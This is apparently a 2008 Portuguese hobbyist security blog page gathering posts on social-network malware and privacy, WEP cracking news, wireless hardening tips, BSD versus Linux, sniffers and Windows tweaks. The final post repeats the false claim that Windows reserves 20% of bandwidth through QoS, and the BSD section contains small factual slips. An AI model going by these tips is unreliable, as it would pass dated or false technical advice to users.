sexta-feira, 16 de maio de 2008

Os perigos das redes sociais



A web é social. Chegou-se nessa conclusão com a explosão dos sites de redes sociais, que buscam formar comunidades virtuais e disponibilizar ao usuário um meio para se apresentar ao mundo. Se de um lado estes sites apenas exploram o lado mais social do meio de comunicação que é a Internet, do outro estão os riscos à privacidade e à segurança do internauta que fizer uso desses serviços.
No Brasil, o site mais visitado por internautas interessados em uma rede social é o Orkut, do Google. Nos Estados Unidos e em outros países de língua inglesa, o MySpace, da News Corp., é mais popular. Apesar de possuírem funcionalidades e recursos diferentes, esses dois sites (e outras dezenas que surgiram para tentar sugar um pouco dos usuários que procuram por uma rede social) possuem o mesmo objetivo.

Um pouco de história
Os ataques mais violentos ao Orkut começaram no início de 2006, talvez um pouco antes, mas foi só na metade daquele ano que eles se intensificaram. No início de abril de 2006, a matéria Bankers utilizam Orkut para se espalhar, publicada aqui noBT HACKER, comunicou a existência de mensagens maliciosas que circulavam pelo Orkut. As mensagens espalhavam vírus, mas ainda não se sabia se as mensagens eram enviadas automaticamente pelo vírus ou manualmente por criminosos que roubaram dados da conta de um internauta.
A resposta chegou no mês seguinte, em maio, quando uma praga digital automatizada atacou o Orkut. A agressividade com que a praga se espalhou deixava claro que os outros ataques de que se tinha conhecimento até aquele momento tinham sido feitos manualmente. Em matéria do dia 22 de maio, a BTHacker publicou uma ferramenta para remover a praga.
Em alguns dias, a ferramenta alcançou a marca de 300 mil downloads. Os próprios usuários do Orkut é que espalharam links pelas comunidades divulgando a ferramenta. Mais tarde, criminosos se aproveitaram da situação para enviar mensagens maliciosas que ofereciam a “ferramenta de remoção”, mas que na verdade distribuíam um vírus semelhante ao que a ferramenta verdadeira se encarregava de remover.
Porque atacar usuários de redes sociais
Sites de redes sociais dependem exclusivamente de conteúdo enviado por seus usuários. Qualquer tentativa de restringir ou dificultar o envio ou o acesso a informações pode resultar numa queda no número de recados, depoimentos ou discussões que acontecem dentro da rede. O site não deve testar a paciência dos usuários com verificações de legitimidade de cada ação que ele faz, pois isso pode diminuir o interesse do internauta em usá-lo.
A facilidade com que um humano ou ferramenta automatizada pode enviar mensagens aos sites de redes sociais é um claro incentivo para criminosos. É fácil poluir a rede com mensagens maliciosas para espalhar todo tipo de praga digital e o primeiro passo de evolução nesse sentido foi automatizar o ataque.
As pragas espalhadas pelo Orkut geralmente roubam senhas de banco, o que também demonstra um incentivo financeiro. É um mercado negro e, quanto mais dinheiro se ganha, mais se pode investir na evolução das técnicas de infecção e disseminação. Há uma necessidade constante de evolução para acompanhar melhorias em ferramentas de segurança e no conhecimento do usuário, que vai aprendendo a lidar com golpes mais antigos.
O número de sites que as pragas digitais monitoram também aumentou e com ele o número de possíveis vítimas. Não só de bancos, mas usuários de lojas online e de sites de companhias aéreas — que vendem passagens pela Internet — também são alvo do roubo de dados.
Ao utilizar a rede social, o criminoso recebe um grande bônus. Se um usuário está infectado, este enviará as mensagens que espalham a praga digital para as pessoas que estão em seu círculo de amigos. Isso significa que apenas pessoas que já o conhecem e confiam de alguma forma é que receberão a mensagem, aumentando as chances de a infecção ir adiante.
Abusando da confiança entre os usuários das redes sociais e das próprias redes e seus usuários, os vírus podem se espalhar facilmente, mesmo com táticas simples de engenharia social. Em outras palavras, ataca-se redes sociais porque é fácil e efetivo.

Fim da privacidade?
Ser alvo de um código malicioso automatizado é um problema, sem dúvida, mas muitos internautas participantes de redes sociais jogam fora o pouco que lhes resta da privacidade, já corroída no mundo globalizado.
Alguns empregadores perguntam pelo endereço do perfil do Orkut de candidatos. Os motivos variam, mas estar exposto em uma rede social já não é mais diferente e muitas crianças já querem ter seu perfil online para adicionar seus amigos e participar de comunidades.
O uso de nicks ou apelidos para se comunicar na Internet sempre foi a regra, porém as redes sociais fazem a conexão do internauta com o mundo real. As conseqüências dessa ligação estão apenas começando a aparecer, mas está ficando claro que a sociedade offline parece já esperar que qualquer pessoa tenha suas ações online expostas em um perfil de uma rede social.
Se as informações disponíveis online forem utilizadas cada vez mais para julgar uma pessoa no mundo real, pode ser que essas informações sejam transformadas ou alteradas para sempre apresentar um lado positivo de cada um, servindo como ferramenta de marketing pessoal.

Os perfis são também minas de ouro para criminosos, tanto reais como virtuais. Roubos e seqüestros podem ser facilitados. Ataques de engenharia social, isto é, enganação, também são facilitados quando se conhece a vítima de forma mais pessoal. A própria natureza da rede social exige que seus participantes informem preferências e dados pessoais para facilitar que outras pessoas de interesses semelhantes os encontrem.

Qualquer um ainda pode tirar proveito dos recursos de redes sociais preservando sua identidade e sua privacidade. O MySpace, por exemplo, permite que o perfil seja configurado como privado para que somente amigos possam ver as informações ali presentes. Isso diminui de forma significativa a exposição gerada pelo uso da rede social. Entretanto, o MySpace também tem seus problemas, tanto de privacidade como de segurança, e já foi alvo de códigos maliciosos e adwares várias vezes, porém, por não ser tão popular aqui no Brasil, não será discutido a fundo.
O importante é que cada usuário esteja consciente da exposição e avalie se ela é mesmo desejada e positiva. É preciso estar longe da ilusão de que existe algo protegendo os dados dentro da rede, tal como o requerimento de convite exigido por algumas delas. Qualquer um que realmente queira pode conseguir um sem dificuldade. No entanto, ele só poderá ver aquilo que cada um estiver disposto a mostrar e, se informações falsas encontrarem um lugar dominante nas redes sociais, pode ser que estas redes percam seu valor.

Crackers criam novo médoto que quebra Wi-Fi em 1 min








Nova pagina 1




Crackers desenvolveram uma nova técnica para quebrar a criptografia de uma
rede sem fio segura WEP de 104-bits em menos de um minuto. A vulnerabilidade em

redes
Wi-Fi que utilizam este padrão já era conhecida há cerca de um ano, só
que agora é necessário apenas um décimo do número de pacotes usado para explorar
a falha, tornando a invasão muito mais rápida.



Segundo o site The Register, a técnica provê 50% de chance de conseguir a chave
em cerca de 1 minuto rodando sob uma rede 802.11g em velocidade máxima e com a
captura de 40 mil pacotes. Dobrando o período de captura de pacotes necessários
para a análise e quebra da proteção, a chance aumenta para 95%.



Os pesquisadores Erik Tews, Ralf-Philipp Weinmann e Andrei Pyshkin, da
Universidade Técnica de Darmstadt, na Alemanha, explicaram que após a captura
dos pacotes, em apenas três segundos de processamento em um computador padrão é
possível revelar a chave.



Conforme ataques anteriores, a quebra do código é feita na exploração de falhas
na criptografia RC4, conhecida desde 2001. Há seis anos matemáticos mostraram a
ineficiência do protocolo, mas o ataque era trabalhoso e requeria a
interceptação de 4 milhões de pacotes de

dados
para que a chave fosse descoberta, conforme noticiou o site PC World.



Como recomendação está o uso de uma rede com padrão de criptografia WPA, que é
mais resistente aos ataques, embora utilizado com menos freqüência do que o
popular padrão WEP.



Outros métodos incluem uso de um

sistema
de detecção de intrusão no sistema (IDS), que revelaria as inúmeras
tentativas de obtenção de pacotes através de requisições ARP; ou confundir os
hackers escondendo a chave real em meio a inúmeras outras inválidas.



O estudo completo pode ser acessado em PDF através do atalho:




http://dtmurl.com/a2u


 








Segurança em Wireless em apenas 12 passos

Bom na nossa postagem de hj estaremos comentando sobre a segurança para quem ultiliza Rede Wireless!! Espero q gostem abração





1) Mudar a password e utilizador de gestão no router
A alteração das credenciais de acesso ao router, que vêm por omissão, devem ser de imediato trocadas. Caso contrário, uma rápida pesquisa no Google e eureka!!!. Lá estão elas. Aqui está um exemplo: Passwords e users por omissão

2) Mudar a encriptação
A encriptação WEP de 64 bits já não é muito utilizada uma vez que foi quebrada em 2001. Aconselho a usarem uma encriptação de 128 bits. Mas mesmo perfeito, perfeito, perfeito é usarem WPA ou mesmo WPA2. Saber mais sobre: WEP e WPA

3) Desabilitar o broadcast do SSID
Desta forma escondemos a nossa rede, mais concretamente o nome da nossa rede (SSID - Service Set IDentifier), tornando mais difícil aos intrusos descobrirem a existência de uma rede. Mais sobre SSID

4) Filtar os clientes por MAC Address
Devemos incluir o endereço MAC, de cada interface, das máquinas que terão permissão de se ligar na rede e bloquear todos os outros. Para saber o MAC da sua interface vá à linha de comandos e escreva ipconfig /all.
O comando devolverá uma string do tipo 00-A0-1A-53-45-A3. Saber mais

5) Limitar a atribuição de IP
Outra forma de configurar segurança na nossa rede é limitar a atribuição de endereços IP, isto é, tornar só disponíveis o numero de endereços IP que pretendemos. Como medida radical pode-mos sempre definir o ponto 7.

6) Efectuar upgrades ao firmware do router
Convém de vez em quando verificar se existem actualizações para o seu router. Por norma, essas actualizações resolvem bugs verificados no aparelho e em muitas situações aumentam a performance.

7) Desabilitar o DHCP
Ao desabilitar o DHCP (Dynamic Host Configuration Protocol), o utilizador deverá configurar manualmente o endereço IP, máscara, gateway e DNS na sua máquina. Desta forma, os intrusos terão de saber qual a gama de IP’s utilizada na nossa rede. Saber mais sobre o protocolo de atribuição de endereços IP: DHCP

8 ) Habilitar o firewall do Router
Alguns routers já trazem firewalls. Se é o seu caso deverá então habilitá-la. Outra opção é bloquear os pings ao router (bloquear o protocolo ICMP - Internet Control Message Protocol).

9) Posição estratégica do Router
Esta medida nem sempre é fácil, uma vez que há alguns routers que conseguem enviar o sinal para além daquilo que nós queremos. Para isso devemos testar a partir de alguns lugares da nossa casa de forma a minimizarmos a “fuga” de sinal para outras habitações. Existem também alguns routers que permitem configurar a “força” de sinal.

10) Observar diariamente os logs
Os logs são o nosso “big brother” da rede, ou seja, o diário (não perfumado) da rede . Registam por norma tudo aquilo que passa na nossa rede: autenticações, acessos, acessos indevidos, etc etc. No meu router (Belkin), os logs encontram-se em Security log.

11) Usar um Radius
Para quem pensar em ter uma solução mais profissional devem usar um RADIUS (Remote Authentication Dial In User Service - para autenticar os utilizadores). Como exemplo gratuito temos o freeradius que é uma excelente opção.

12) Desabilitar a gestão remota
Convém desabilitar a gestão remota do router via placa wireless. Para a gestão do nosso router podemos sempre usar o tradicional cabo de consola com fichas DB-9 (para ligação a portas COM).

É claro que existem muitas outras possibilidade para garantir segurança numa rede wireless. Neste artigo foram debatidas as mais básicas e comuns formas de resolver muitas situações. É claro que se alguma coisa acontecer à nossa rede, o nosso vizinho será o primeiro a apanhar com as culpas.

Agradecimento

Bom pessoal eu queria agradecer a todos pela frequencia de vcs aqui no nosso site
espero q vcs gostem das nossas postagens e quero pedir tbm q vcs possam estar entrando em contato conosco pois queremos saber ti vcs oq vcs querem ver no site e etc... como pro exemplo duvidas i etc... si vcs tiverem duvidas podem entrar em contato conosco ow comigo
meu endereço é:wesley_capoeira14_@hotmail.com ow o nosso e-mail burlatudo@hotmail.com

Obrigado pela atenção di vcs e um otimo final de semana
By:TPC HACKER

quinta-feira, 15 de maio de 2008

Windows XP SP3



Bom a gente demorou mais tbm estamos colocando a versão SP3 do Windows XP
Obs:Pode aprezentar erros na hora de instalar a placa de som!!!

http://baixaki.ig.com.br/download/Windows-XP-Service-Pack-3.htm

Continuação doque é UNIX , BSD e Linux4 parte!!!

Então qual é realmente a diferença entre, digamos, o Debian Linux e o FreeBSD? Pra maioria dos usuários, as diferenças são surpreendentemente pequenas: Ambos são sistemas operacionais UNIX-like. Ambos são desenvolvidos por projetos não comerciais (é claro que isso não se aplica a muitas outros distribuições Linux). Na próxima seção, vamos dar uma olhada no BSD e compará-lo com o Linux. As descrições se aplicam mais ao FreeBSD, que somatiza uma média estimada de 80% das instalações de sistemas BSD, mas as diferenças pro NetBSD e pro OpenBSD são pequenas.

4.1. Quem é dono do BSD?
Nenhuma pessoa ou corporação é dona do BSD. Ele é criado e distribuído por uma comunidade de contribuidores altamente técnicos em todo o mundo. Alguns dos componentes do BSD são projetos Open Source gerenciados por mantenedores de projetos distintos.

4.2. Como o BSD é desenvolvido e atualizado?
Os kernels do BSD são desenvolvidos e mantidos seguindo o modelo de desenvolvimento do Open Source. Cada projeto mantém uma árvore de código fonte publicamente acessível sob o Sistema de Versões Concorrentes (CVS), que contém todos os arquivos fontes do projeto, incluindo documentação e outros arquivos acidentais. O CVS permite que usuários façam check out (em outras palavras, extrair uma cópia) de qualquer versão desejada do sistema.

Um grande número de desenvolvedores ao redor do mundo contribuem para as melhorias do BSD. Eles são divididos em 3 tipos:

Contribuidores escrevem código e documentação. Eles não tem permissão de commit (adicionar código) diretamente na árvore de código fonte. Para que seu código seja incluso no sistema, é necessário que seja revisado e aprovado por um desenvolvedor registrado, os quais são conhecidos como committer.

Committers são desenvolvedores com acesso de escrita na árvore do código fonte. Para se tornar um commiter, o indivíduo deve mostrar habilidade na área em que ele é ativo.

Faz parte da responsabilidade individual de cada desenvolvedor considerar quando devem obter autorização antes de fazer um commit na árvore. No geral, desenvolvedores experientes podem fazer modificações que são óbviamente corretas sem precisar de consenso. Por exemplo, um commiter do projeto de documentação pode corrigir erros tipográficos ou gramáticais sem a necessidade de uma revisão. Por outro lado, espera-se que desenvolvedores que fazem alterações muito abrangentes ou complicadas enviem suas mudanças para revisão antes de adicioná-las. Em casos extremos, um membro do Grupo Central (Core Team) cuja função seja, o Arquiteto Principal pode ordenar que as modificações sejam retiradas da árvore do código fonte, em um processo conhecido como backing out. Todos os desenvolvedores recebem mensagens de correio eletrônico sobre cada alteração individual, portanto é impossível fazer alguma modificação secretamente.

O Grupo Central. O FreeBSD e o NetBSD cada qual, tem um grupo central que gerencia o projeto. Tais grupos centrais foram criados no decorrer dos projetos e seu papel não é sempre bem definido. Não é preciso ser um desenvolvedor para se tornar membro do grupo central, apesar de que, normalmente esse é o caso. As regras para o grupo central variam de um projeto para o outro, mas no geral eles tem mais voz na hora de dizer as direções que o projeto deve seguir, do que outros membros fora do grupo.

Esse modelo se diferencia do Linux em inúmeras maneiras:

Não existe uma pessoa em especial que controla o conteúdo do sistema. Na prática, essa diferença é sobretaxada, considerando que o Arquiteto Chefe pode solicitar que códigos sejam retirados do sistema, e que até mesmo o projeto Linux tem várias pessoas autorizadas a fazer modificações.

Por outro lado, existe um repositório central, um lugar único onde os fontes inteiros do sistema operacional podem ser encontrados, incluindo todas as versões anteriores.

Os projetos BSD mantém um Sistema Operacional completo, não apenas o kernel. Essa distinção é marginalmente proveitosa: nem o BSD nem o Linux são úteis sem aplicações. As aplicações usados sob BSD são frequentemente as mesmas aplicações usadas sob Linux.

Como resultado da manutenção formalizada de uma única árvore CVS do código fonte, o desenvolvimento do BSD é limpo, e é possível acessar qualquer versão do sistema por seu número de lançamento (release) ou por data. O CVS ainda oferece manutenção incremental ao sistema: por exemplo, o repositório do FreeBSD é atualizado em média 100 vezes por dia. A maioria dessas alterações são de pequena ordem.

4.3. Releases BSD
Cada projeto BSD oferece o sistema em três versões (releases) diferentes. Como no Linux, os releases são identificados por um número, como 1.4.1 ou 3.5. Em adição, o número da versão tem um sufixo, indicando seu propósito:

A versão de desenvolvimento do sistema é chamada de CURRENT. O FreeBSD relaciona um número ao CURRENT, por exemplo FreeBSD 5.0-CURRENT. O NetBSD usa um esquema de denominação um pouco diferente, adicionando um sufixo com uma letra única que indica modificações nas interfaces internas, por exemplo NetBSD 1.4.3G. O OpenBSD não adiciona números ("OpenBSD-current"). Todo novo desenvolvimento no sistema vai nesse branch.

Em intervalos regulares, entre duas a quatro vezes por ano, os projetos lançam uma nova versão de RELEASE do sistema, que é disponibilizado em CD-ROM e por download gratuíto em sítios de FTP, por exemplo OpenBSD 2.6-RELEASE ou NetBSD 1.4-RELEASE. A versão do RELEASE é destinada a usuários finais e é a versão normal do sistema. O NetBSD oferece ainda patch releases (releases de correções) com um terceiro dígito, por exemplo, NetBSD 1.4.2.

Conforme os problemas são encontrados em uma versão RELEASE, eles são corrigidos, e as correções são adicionadas à árvore CVS. No FreeBSD a versão resultante é chamada de STABLE, enquanto que no NetBSD e no OpenBSD elas continuam sendo chamadas de versão RELEASE. Novas características menores também podem ser adicionadas nesse branch depois do período de testes no CURRENT.

Em contraste, o Linux mantém duas árvores de código separadas: a versão estável e a versão de desenvolvimento. A versão estável tem ainda um número menor de versão, como 2.0, 2.2 ou 2.4. Versões em desenvolvimento tem o número menor ímpar, como 2.1, 2.4 e 2.5. Em cada caso, a versão é ainda seguida de um número posterior designando o release exato. Em adição, cada vendedor de Linux coloca suas próprias aplicações e utilitários à nível de usuário, portanto o nome de sua distribuição também é importante. Cada distribuição do vendedor ainda é acrescida de seu próprio número, então a descrição completa seria algo parecido com TurboLinux 6.0 com kernel 2.2.14

4.4. Quais são as versões disponíveis do BSD?
Em contraste com as numerosas distribuições Linux, existe apenas três BSDs de código livre. Cada projeto BSD mantém sua própria árvore de código fonte e seu próprio kernel. Na prática, as divergências entre o código à nível de usuário parece ser ainda menor entre os projetos BSD do que entre os vários Linux.

É difícil categorizar os objetivos de cada projeto: as diferenças são bastante subjetivas. Basicamente,

O FreeBSD clama por alta performance e facilidade de uso para usuários finais, e é o favorito de provedores de conteúdo da rede mundial de computadores. Ele pode ser usado em PCs e Compaqs com processadores Alpha. O projeto FreeBSD possui significativamente mais usuários do que os outros projetos.

O NetBSD clama pelo máximo de portabilidade: é lógico que roda NetBSD. Ele roda de máquinas palmtop à grandes servidores, e vem sendo usado até em missões espaciais da NASA. É particularmente uma boa escolha para rodar em equipamentos antigos que não sejam Intel.

O OpenBSD clama por segurança e pureza de código: ele usa uma combinação dos conceitos de código livre com rigorosas revisões de seu código para criar um sistema demonstravelmente correto, tornando-o a escolha de organizações conscientes com a segurança como bancos e departamentos do governo. Como o NetBSD, ele roda em várias plataformas.

Existem ainda dois sistemas operacionais BSD adicionais que não são de código livre, o BSD/OS e o Mac OS X da Apple:

O BSD/OS é o mais velho dos derivados do 4.4BSD. Ele não é de código livre, apesar que as licenças de seu código fonte é disponível a um preço relativamente baixo. Ele assemelha-se ao FreeBSD de diversas formas.

O Mac OS X é a mais recente versão do sistema operacional da linha Macintosh da Apple Computers Inc. Ao contrário do resto do sistema operacional, o kernel é código livre. Como parte desse desenvolvimento, desenvolvedores chave da Apple tem acesso de modificações na árvore do FreeBSD.

4.5. Como a licença BSD se diferencia da licença Pública GNU?
O Linux está disponível sob a Licença Pública Geral GPL (GPL), que foi planejada para eliminar o software proprietário (de fonte fechada). Em particular, qualquer trabalho derivado de um produto lançado sob a GPL também deve oferecer seu código fonte, caso seja requerido. Em contraste, a licença BSD é menos restritiva: distribuições apenas binárias são permitidas. Isso é particularmente atrativo para aplicações acopladas (embedded).

4.6. O que mais eu deveria saber?
Considerando que um número menor de aplicações estão disponíveis para o BSD do que para o Linux, os desenvolvedores do BSD criaram um pacote de compatibilidade Linux, que permite que programas Linux sejam executados sob BSD. O pacote inclui modificações no kernel, de forma a possibilitar as corretas chamadas de sistemas Linux, e arquivos de compatibilidade Linux, como a biblioteca C. Não existe diferença notável na velocidade de execução entre aplicações Linux rodando em uma máquina Linux e aplicações Linux rodando em uma máquina BSD de mesma velocidade.

A natureza tudo do mesmo fornecedor dos sistemas BSD implica na maior facilidade de atualização do que frequentemente acontece no caso do Linux. Os BSD oferecem atualizações de versões de bibliotecas oferecendo módulos de compatibilidade com versões mais antigas de bibliotecas, dessa forma é possível rodar binários que existem há vários anos sem o menor problema.

4.7. Qual eu devo usar, BSD ou Linux?
O que isso tudo significa na prática? Quem deve usar BSD? Quem deve usar Linux?

Essa é uma pergunta muito difícil para se responder. Aqui estão algumas considerações:

Se não está quebrado, não conserte: Se você já usa algum sistema operacional de código livre, e está feliz com ele, provavelmente não existe uma boa razão para mudar.

Sistemas BSD, em particular o FreeBSD, podem ter performance notávelmente superior ao Linux. Mas isso não é uma regra. Em muitos casos a diferença pode ser pouca ou até mesmo nem existir. Em alguns casos o Linux pode funcionar melhor que o FreeBSD.

No geral, sistemas BSD tem melhor reputação por sua confiabilidade, principalmente por ser resultado de uma base de códigos mais madura.

A licença BSD pode ser mais atrativa do que a GPL.

BSD pode executar código de Linux, enquanto o Linux não pode executar código de BSD. Como resultado, existe uma maior disponibilidade de software para BSD do que para Linux.

4.8. Quem oferece suporte, serviços e treinamento para o BSD?
A BSDi sempre ofereceu suporte ao BSD/OS e recentemente anunciaram contratos de suporte para o FreeBSD.

Em adição, cada um dos projetos tem uma lista de consultores que podem ser contratados

Oque é um BSD e Oque é um UNIX de verdade

Quantas e quantas vezes vc ja ouviu falar de BSD
As vezes vc nem sabe oque é isso néh rs
mais hj aqui no BT Hacker vc ira conhecer realmente oque é isso!!!



BSD significa Distribuição do Sistema de Berkeley. É o nome da distribuição de códigos fonte proveniente da Universidade da Califórnia, Berkeley, as quais foram originalmente extensões para o sistema operacional UNIX do departamento de Pesquisas da AT&T. Vários projetos de sistemas operacionais de código aberto são baseados em uma distribuição desse código fonte, conhecido como 4.4BSD-Lite. Em adição, tais sistemas constituem-se de várias porções de outros projetos de Código Aberto, incluindo o notável projeto GNU. A constituição total do sistema operacional inclui:

O kernel BSD, que cuida do agendamento de processos, gerenciamento de memória, multi-processamento simétrico (SMP), dispositivos de controle, etc.

Ao contrário do kernel do Linux, existem vários kernels distintos de sistemas BSD com diferentes características e recursos.

A biblioteca C, a API base do sistema.

A biblioteca C do BSD é baseada em código proveniente de Berkeley, e não do projeto GNU.

Programas utilitários como shells, utilitários de manuseio de arquivos, compiladores, linkadores.

Alguns desses programas são derivados do projeto GNU, outros não.

O sistema X Window, que provê uma interface gráfica.

O sistema X Window usado na maioria das versões do BSD é mantido por um projeto separado, o Projeto XFree86. Trata-se do mesmo código usado por sistemas Linux. O BSD normalmente não especifica nenhum desktop gráfico como o GNOME ou o KDE,contudo, tais ambientes estão sempre disponíveis.

Muitos outros programas e utilitárioss.


2°Oque é um UNIX de verdade?

Os sistemas operacionais BSD não são clones, mas sim, código livre derivado diretamente do sistema operacional UNIX da AT&T, que também é o ancestral dos modernos UNIX System V. Talvez isso lhe surpreenda. Como pode ser isso, se a AT&T nunca disponibilizou seus fontes como código aberto?

É verdade que o UNIX da AT&T não é Open Source, e do ponto de vista da licença de direitos legais, o BSD definitivamente não é UNIX, mas por outro lado, a AT&T importou muito código de outros projetos, especialmente do Grupo de Pesquisas de Ciências Computacionais da Universidade da Califórnia, em Berkeley, CA. Desde 1976 o CSRG lançava fitas magnéticas com cópias de seu software, o qual era chamado de Distribuição do Software de Berkeley ou BSD.

As versões iniciais do BSD consistiam-se fundamentalmente de programas à nível de usuário, mas essa realidade mudou dramaticamente assim que o CSRG fechou um contrato com a Agência de Pesquisas e Projetos de Avançados de Defesa (a DARPA) para atualizar os protocolos de comunicação que eram usados em sua rede, a ARPANET. Os novos protocolos passaram a ser conhecidos como Protocolos de Internet, e mais tarde como TCP/IP se tornando os mais importantes protocolos de todos os tempos. A primeira implementação amplamente distribuída desses protocolos eram parte do 4.2BSD, em 1982.

Ao longo da década de 80, várias empresas que produziam estações de trabalho começaram a se espalhar. Muitas delas preferiam licenciar o UNIX ao invés de desenvolverem sistemas operacionais por si mesmas. A Sun Microsystems em particular, licenciou o UNIX e implementou uma versão do 4.2BSD, a qual eles chamaram de SunOS. Quando a AT&T se deu permissão para vender o UNIX comercialmente, começaram a desenvolver uma implementação ``na unha'' chamada de System III, que seria rapidamente sucedida pelo System V. A base do código do System V não incluia o suporte a networking, então todas as implementações passaram a incluir software adicional do BSD, incluindo o TCP/IP, e também programas utilitários como o interpretador de linha de comandos csh e o editor vi. Em sua coletividade, estas aprimorações foram conhecidas como Extensões de Berkeley.

As fitas magnéticas do BSD continham código fonte da AT&T e por isso precisavam de uma licença de fontes do UNIX. Por volta de 1990, os fundos do CSRG estavam acabando. Alguns membros do grupo decidiram lançar o código BSD, que era Open Source, sem o código proprietário da AT&T. Finalmente isso aconteceu com o Networking Tape 2, normalmente conhecido como Net/2. O Net/2 não era um sistema operacional completo: aproximadamente 20% do código do kernel estava faltando. Um dos membros do CSRG, William F. Jolitz, escreveu o código que faltava e o lançou em 1992, como o 386BSD. Ao mesmo tempo, um outro grupo de membros do extinto CSRG formou uma empresa comercial chamada de Berkeley Software Design Inc. e lançou uma versão beta de seu sistema operacional, chamada de BSD/386, baseado nos mesmos fontes. Depois o nome do sistema operacional mudou para BSD/OS.

O 386BSD nunca se tornou um sistema operacional estável. Ao invés disso, outros dois projetos nasceram à partir dele, em 1993: O NetBSD e o FreeBSD. Originalmente os dois projetos divergiram devido à diferenças quanto à paciência na espera de novas melhorias no 386BSD: o pessoal do NetBSD começou o projeto no início do ano, e a primeira versão do FreeBSD não ficou pronta até o final do ano. No meio tempo, a base do código se modificou o suficiente para tornar difícil uma união. Em adição, os projetos tinham objetivos diferentes, como veremos a seguir. Em 1996, um projeto posterior, o OpenBSD, originou-se à partir do NetBSD.

3°Por quê BSD não é mais conhecido?

Por algumas razões, o BSD é relativamente desconhecido:

Os desenvolvedores do BSD estão frequentemente mais interessados em aprimorar seu código do que fazer propaganda dele.

A maior parte da popularidade do Linux se deve a fatores externos ao projeto Linux, como a imprensa, e companias criadas para oferecer serviços em Linux. Até recentemente, os BSDs open source não contavam com tais proponentes.

Os desenvolvedores BSD tendem a ser mais experientes do que desenvolvedores Linux, e tem menos interesse em tornar o sistema fácil de utilizar. Novatos tendem a se sentir mais confortáveis com Linux.

Em 1992, a AT&T processou a BSDI, vendedora do BSD/386, alegando que o produto continha código proprietário da AT&T. O caso foi resolvido na corte, em 1994, mas os aspectos da litiginação continuam perseguindo as pessoas. Em Março de 2000 um artigo publicado na rede afirmou que o caso havia sido resolvido recentemente.

Um detalhe que o processo judicial carificou foi sobre a denominação: nos anos 80, os BSD eram conhecidos como BSD UNIX. Com a eliminação do último vestígio de código da AT&T no BSD, ele também perdeu o direito de ser chamado de UNIX. Contudo ainda podem ser vistas referências em títulos de livros como the 4.3BSD UNIX operating system e the 4.4BSD operating system.

Existe uma idéia que os projetos BSD sejam fragmentados e beligerantes. O Wall Street Journal falou de balkanização nos projetos BSD. Assim como o processo judicial, essas idéias se baseiam fundamentalmente em história antiga.

O que é um sniffer?


Certamente que todos já ouviram falar em sniffers de rede… Mas afinal o que é isto?

O que é um sniffer?

Um sniffer não é nada mais nem menos que uma aplicação (também pode ser hardware) que analisa e monitoriza todo o tráfego que passa num segmento da nossa rede. Pode ser usado por Hackers para “capturar/roubar” dados importantes pois no meio dos pacotes capturados podem estar passwords e outros dados pessoais de um determinado utilizador mas, é também uma ferramenta de eleição usada por quase todos os administradores de redes, pois permite detectar e posteriormente resolver muito problemas que por vezes acontecem numa determinada rede.


Com um sniffer, podemos monitorizar o acesso a determinados serviços de rede como por exemplo e-mail, acesso remoto (telnet, rlogin), transferência de ficheiros (FTP), etc. Permite-nos ainda identificar a existem de tráfego anormal na nossa rede. Um exemplo vulgar, é alguém mal intencionado andar pela nossa rede à procura de dados, como por exemplo passwords, para mais tarde poder usar. Imaginem que os dados que passam na nossa rede não estão criptografados? Óptimo para o hacker !!!

Os sniffers mais conhecidos para sistemas Linux são o tcpdump, ethereal. Para Windows também existe o ethereal, ou winshark que foi concebido pelos mesmos autores do ethereal. Se fizerem uma pesquisa no Google irão encontrar muitas referências a sniffers. Aqui têm uma lista com alguns deles. O processo de “sniffing” está associado a uma ou mais interfaces de rede de um determinado computador.

Essa postagem é para quem curte Java!!!!




Bom aqui no site ja temos algo relacionado com java
Mais é algo iniciante,mais como eu sou um cara q ama aprofundar o conhecimento
dos vizitantes vejo até vcs hj com esse link novo
entrem é só fazer o download ta fazinho blz abração
By:Wesley



http://www.scriptbrasil.com.br/codigos/javascript/menus-javascript/

Como gravar videos de jogos

Primeira postagem agora! ;D
Bom, esse blog foi feitu com o objetivo de ajudar os noobs em geral, sendo nos jogos ou na net msm. Dando ajudas e dicas sobre alguns jogos e programas que melhoram a vida de quem esta navegando ...
Com o tempo melhoraremos mas por enquanto eh issu.
Para akeles que gostam de jogar, nos esforcaremos au maximo para ajuda-los.
^^

Tipo, depois eu boto algns jogos aki mt legais e tals , mas aki vai um programa pra quem ker gravar uns videos e num sabe cm. Game Cam Pro. Ele eh mt bom e captura us videos enquanto vc joga, eh parecido com o progama Fraps, soh q eh mt melhor pq ele não trava o jogo quando se está jogando deixando assim seu FPS muito acima se comparando com outros softwares, mas ainda temos outra grande vantagem que é a redução do tamanho do vídeo, o GameCam deixa um vídeo de um minutos com aproximadamente 30mb, enquanto o Fraps deixa o mesmo vídeo de um minuto com 1.6gb.

1º Passo: Execute o programa, irá aparece uma tela dizendo que o programa esta sendo inicializado. Depois que ela desaparecer, o ícone do programa ficara perto do relógio. Aperte com o botão direito do mouse para que esse janelinha apareça.

2º Passo: Vá em Profile Manager. Quando você escolher essa opção ele vai te mandar pro site do programa na parte que esta explicando como funciona o programa, então se você sabe inglês vale apenas conferir, se não sabe, continue acompanhando.

3º Passo: Clique em Profile Wizard e uma janela de busca irá aparecer, não cancele pois irá procurar quais jogos estão instalados no momento e será nesta hora que você irá selecionar o jogo CS:S.

4º Passo: Vamos configurar os botões. Com o GameCam aberto clique em Hot Keys irá parecer todos os atalhos que você irá precisar para gravar, parar a gravação, pause dentre outros, configure como quiser ou deixe com padrão. As Hotkeys principais são:

Começar a gravar vídeo: Botão Home
Pausar Gravação: Botão P
Terminar Gravação: Botão End

Quando você executar o jogo é possível que aparece uma tela pequena no canto inferior direito, para fechar ela é só apertar Botão de Infertace + F4.

Minimum
Windows XP (US/European version)
800 MHz CPU
16MB RAM (in addition to game requirements)
100% DirectX compliant hardware video accelerator with 32MB on board video memory

Recommended
Windows XP (US/European version)
1 GHz or better CPU
32MB RAM (in addition to game requirements)
100% DirectX compliant hardware video accelerator with 32MB on board video memory or better.

Download : http://www.planetgamecam.com/?locid=download

Melhorando sua Speedy e seu Windows

Seu windows esta lento e u download de qualquer programa eh uma lentidao??? Eh soh seguir esses passos entaum:
1. Melhorando sua internet

Na sua configuração o Windows reserva 20% da capacidade da conexão de seu pc. Pra vc usar 100% da sua internet vc tem de ir em: Menu Iniciar> Executar> gpedit.msc> Configuração do computador> Modelos administrativos> Rede> Agendador de pacotes QoS> Limitar largura de banda resertável. Deixa ativado e no lugar de 20%, coloque 0%.

2. Melhorando o Desempenho
Clique como botao direito do mouse no "Meu Computador"> Avançado> Desempenho> Configurações> Efeitos Visuais>
